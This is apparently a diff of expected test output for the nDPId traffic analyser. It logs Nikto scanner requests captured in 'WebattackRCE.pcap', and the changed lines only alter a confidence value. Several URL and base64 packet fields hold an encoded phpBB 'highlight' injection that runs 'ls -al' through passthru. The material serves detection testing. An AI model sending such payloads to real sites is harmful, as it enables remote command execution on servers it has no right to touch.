00859{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277797,"pkt":"AAAAAAAAAAAAAAAACABFAAFPlMhAAEAGpt5\/AAABfwAAAcbwH5AHpq3wv20OaIAYAED\/QwAAAQEICp1m\/02dZv9NR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}} +01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277799,"pkt":"AAAAAAAAAAAAAAAACABFAAFm4IpAAEAGWwV\/AAABfwAAAcbyH5CWqtmi9bUd64AYAED\/WgAAAQEICp1m\/0+dZv9PR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277800,"pkt":"AAAAAAAAAAAAAAAACABFAAFvelxAAEAGwSp\/AAABfwAAAcb0H5AcBENxXyULZYAYAED\/YwAAAQEICp1m\/1CdZv9QR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277802,"pkt":"AAAAAAAAAAAAAAAACABFAAF0IClAAEAGG1l\/AAABfwAAAcb2H5CLkRkOnTgF7oAYAED\/aAAAAQEICp1m\/1GdZv9RR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KDQo="} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277803,"pkt":"AAAAAAAAAAAAAAAACABFAAFudhVAAEAGxXJ\/AAABfwAAAcb4H5C7R086db2J2oAYAED\/YgAAAQEICp1m\/1OdZv9TR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277804,"pkt":"AAAAAAAAAAAAAAAACABFAAFsoC9AAEAGm1p\/AAABfwAAAcb6H5AztpkH42OkkoAYAED\/YAAAAQEICp1m\/1SdZv9UR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277807,"pkt":"AAAAAAAAAAAAAAAACABFAAFsAqdAAEAGOON\/AAABfwAAAcb8H5ASjTuPR79V4YAYAED\/YAAAAQEICp1m\/1edZv9XR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 